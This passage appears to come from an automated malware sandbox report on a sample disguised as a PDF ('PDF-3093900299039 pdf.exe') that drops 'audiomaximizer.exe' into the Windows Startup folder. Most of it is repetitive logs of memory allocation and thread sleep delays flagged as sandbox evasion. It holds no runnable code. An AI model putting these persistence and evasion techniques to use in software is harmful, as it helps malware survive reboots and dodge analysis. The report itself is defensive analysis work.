            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiomaximizer.exe PID: 7404, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: 2820000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: 4820000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: 1CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: 3660000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeMemory allocated: 1E40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMemory allocated: 50C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMemory allocated: 1680000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMemory allocated: 30B0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeMemory allocated: 50B0000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599310Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599200Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 599062Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598843Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598388Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598280Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598170Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 598062Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 597077Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596825Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596717Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596544Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596424Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeThread delayed: delay time: 594327Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599750
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599640
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599531
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599422
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599312
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599202
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 599093
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598984
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598874
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598765
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598656
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598544
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598437
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598328
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598218
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598109
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 598000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597890
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597763
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597655
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597546
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597437
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597325
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597218
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597109
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 597000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596890
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596781
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596671
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596562
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596452
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596343
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596234
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596125
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 596015
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595906
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595794
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595687
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595578
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595468
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595359
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595250
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595140
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 595031
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594921
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594812
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594703
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594593
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeThread delayed: delay time: 594484
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3683Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeWindow / User API: threadDelayed 1887Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeWindow / User API: threadDelayed 7964Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4258
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 918
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeWindow / User API: threadDelayed 8104
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeWindow / User API: threadDelayed 1745
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep count: 3683 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4944Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep count: 219 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599310s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599200s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -599062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598388s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598280s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598170s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -598062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -597077s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596825s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596544s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596424s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -595093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe TID: 7276Thread sleep time: -594327s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7212Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 5428Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 4258 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 918 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -28592453314249787s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599750s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599640s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599531s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599422s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599312s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599202s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -599093s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598984s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598874s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598765s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598656s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598544s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598437s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598328s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598218s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598109s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -598000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597890s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597763s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597655s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597546s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597437s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597325s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597218s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597109s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -597000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596890s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596781s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596671s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596562s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596452s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596343s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596234s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe TID: 7680Thread sleep time: -596125s >= -30000s
